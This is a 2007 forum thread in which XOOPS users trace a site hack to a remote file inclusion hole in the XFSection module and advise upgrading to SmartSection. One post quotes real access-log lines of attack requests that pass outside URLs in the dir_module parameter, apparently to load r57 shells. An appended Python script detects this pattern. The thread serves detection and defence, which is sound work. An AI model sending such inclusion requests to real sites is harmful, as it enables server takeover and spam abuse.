Posted by akitson on 2007/6/3 19:39:42 (9987 reads) | Posted on Security
Following a hack on one of our websites, the site hosters have claimed that the hack occurred because of insecurity in the Xoops systems.

To quote Easyhosting

Quote:
I think it very likely that we would not host xoops any longer on any of our servers.


Now you have to take this with a little pinch of salt, as the only hacks that have been experienced by us have been on Easyhosting's servers. (Other sites are run on different hosters.) Easyhosting have been asked to provide details (in detail) of the security breaches and the response is awaited. We might be waiting a long time.

In the meantime valentinewalton.co.uk and bbcb.co.uk (not affected yet, but on the same hosters) need a fast and free home for 3-6 months while this stuff gets sorted.

Respond to this news:
Specific offers of help to akitson at bbcb dot co dot uk
Security help - post a comment - help others


Sounds like an improperly configured server to me. If they have their user and file system permissions correctly configured, as well as the software, then directory listings, cross-account code execution and cross site scripting would not be possible.

As a fellow server admin, it sounds more like an issue of ignorance on their part than anything wrong with XOOPS.

On a more personal note, if there is anything I can do to help you, let me know. I have resources available on my personal hosting. It's not the fastest, but it will get you through until you can find a permanent home.
Posted: 2007/6/3 23:28 • Updated: 2007/6/3 23:28
I think many of us care about our XOOPS sites and want to know if they send you any response.

And I sent you a PM.
Posted: 2007/6/4 2:04 • Updated: 2007/6/4 2:04
I've offered to look after one of Atkinson's sites for him for a while - if my bandwidth will take it ... I'd take both, but I'm not sure if I've enough free resources.
Posted: 2007/6/4 3:13 • Updated: 2007/6/4 3:13
Quote:
it sounds more like an issue of ignorance on their part than anything wrong with XOOPS.

I agree. A good host would be able to qualify a statement regarding vulnerabilities of a particular web application. A knee-jerk reaction like that sounds like they don't really know what they're doing. Unless they come up with any concrete evidence, it's time to move.
Posted: 2007/6/4 4:08 • Updated: 2007/6/4 4:10
@akitson I sent you a PM.
Posted: 2007/6/4 5:08 • Updated: 2007/6/4 5:08
Thanks, guys, for your offers of space. I've got a home for one, and Davidl2 has kindly offered space on his space at 3dPixelnet (where I have now got all my other sites, so it makes some sense to keep them together).

As I get more info from easyhosting I'll share it.
Posted: 2007/6/4 6:40 • Updated: 2007/6/4 6:40
The security hole was found in XFSection. If you are running XFSection < 1.12 then you need to upgrade. Not sure how it's done yet.
Posted: 2007/6/8 0:52 • Updated: 2007/6/8 0:52
XFSection's developer suggests that users of the module switch to SmartFactory's Smartsection module. He provides upgrade info here:
http://linux2.ohwada.net/modules/smar ... category.php?categoryid=3
Posted: 2007/6/8 1:28 • Updated: 2007/6/8 1:28
Yes, I think Atkinson was thinking of moving to this.

Atkinson - can you let Easyhosting know of the cause of that issue? Cheers.
Posted: 2007/6/8 2:21 • Updated: 2007/6/8 2:21
Quote:
The security hole was found in XFSection.

Who found that, The Easyhosting techs?
Posted: 2007/6/8 5:42 • Updated: 2007/6/8 5:42
No - Atkinson, the 3dPixelnet techs - and myself

The XFSection developer had fortunately fixed this issue a while ago.
Posted: 2007/6/8 5:48 • Updated: 2007/6/8 5:50
To add to this:

If you are running XFSection then look in your site access logs for entries like these:

07.218.231.178 - - [08/Jun/2007:11:42:57 +0100] "GET /modules/xfsection/modify.php?dir_module=http://www.insanmistik.org/x1.txt? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"

70.86.113.114 - - [08/Jun/2007:03:09:15 +0100] "GET /modules/xfsection/modify.php?dir_module=http://k52.jp/echo? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"

208.67.252.215 - - [08/Jun/2007:03:15:12 +0100] "GET /modules/xfsection/modify.php?dir_module=http://b4ngs4t.com/echo?? HTTP/1.1" 403 490 "-" "libwww-perl/5.79"

65.98.89.146 - - [08/Jun/2007:03:19:52 +0100] "GET /modules/xfsection//modules/xfsection/modify.php?dir_module=http://www.apnic.net/index.html? HTTP/1.1" 403 505 "-" "libwww-perl/5.805"

59.106.13.148 - - [08/Jun/2007:03:28:51 +0100] "GET /modules/xfsection/modify.php?dir_module=http://b4ngs4t.com/echo?? HTTP/1.1" 403 486 "-" "libwww-perl/5.79"

The important bit is /modules/xfsection/modify.php?dir_module=

followed by a random URL. 'libwww-perl' as a user-agent may also be relevant.

This is apparently letting in r57shells (that's what I'm told; the only reference I can find is in German here: http://www.phpforum.de/archiv_57320_P ... en@@blocken_anzeigen.html ).

If you have these types of entries then you are being hacked and the server you are running on is being used to send junk spam mail, potentially in the tens of thousands.

Upgrade to SmartSection is the answer.

I'm going to contact GIJOE to see if he can add something to XOOPS Protector to stop this sort of thing happening.
Posted: 2007/6/8 7:24 • Updated: 2007/6/8 7:26
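A way to scan an access log for the pattern described in the comment above, as an added example (not code from this thread or from XOOPS): it flags requests to /modules/xfsection/modify.php whose dir_module parameter is a remote URL, notes the libwww-perl user agent, and distinguishes entries the server refused with 403 (as all the quoted ones were) from ones that were answered with 200 and need a closer look. It assumes Apache combined log format and runs on constructed sample lines with placeholder hosts.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format, one request per line (assumption for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
XFSECTION_PATH = "/modules/xfsection/modify.php"
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample lines in the format of the entries quoted in the thread
# (RFC 5737 test addresses and placeholder hosts, not the values from the page).
SAMPLE_LOG = """\
192.0.2.10 - - [08/Jun/2007:11:42:57 +0100] "GET /modules/xfsection/modify.php?dir_module=http://attacker.example/x1.txt? HTTP/1.1" 403 486 "-" "libwww-perl/5.805"
192.0.2.11 - - [08/Jun/2007:03:19:52 +0100] "GET /modules/xfsection//modules/xfsection/modify.php?dir_module=http://attacker.example/echo?? HTTP/1.1" 200 1231 "-" "libwww-perl/5.79"
192.0.2.12 - - [08/Jun/2007:03:30:00 +0100] "GET /modules/xfsection/modify.php?dir_module=articles HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.13 - - [08/Jun/2007:03:31:00 +0100] "GET /modules/news/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def inspect_request(rec):
    """Return a finding for an XFSection remote-include attempt, else None."""
    parts = urlsplit(rec["target"])
    # endswith() also catches the doubled path seen in the thread's fourth entry.
    if not parts.path.lower().endswith(XFSECTION_PATH):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("dir_module", [])
    remote = [v for v in values if v.lower().startswith(REMOTE_SCHEMES)]
    if not remote:
        return None  # local module name: not the pattern we are hunting
    return {
        "ip": rec["ip"], "time": rec["ts"], "dir_module": remote[0],
        "status": int(rec["status"]),
        "blocked": rec["status"] == "403",  # refused by the server, as on the page
        "libwww_perl": "libwww-perl" in rec["ua"].lower(),
    }


def scan_log(lines):
    """Run every parseable line through inspect_request and collect the findings."""
    recs = (parse_line(l) for l in lines)
    return [f for f in (inspect_request(r) for r in recs if r) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        state = "blocked (403)" if f["blocked"] else "NOT blocked: investigate host"
        tag = " [libwww-perl]" if f["libwww_perl"] else ""
        print(f"{f['time']} {f['ip']} dir_module={f['dir_module']} -> {state}{tag}")
```

A 200 on one of these requests does not prove the include ran, but it is the entry to start forensics from; a 403 shows the server refused it.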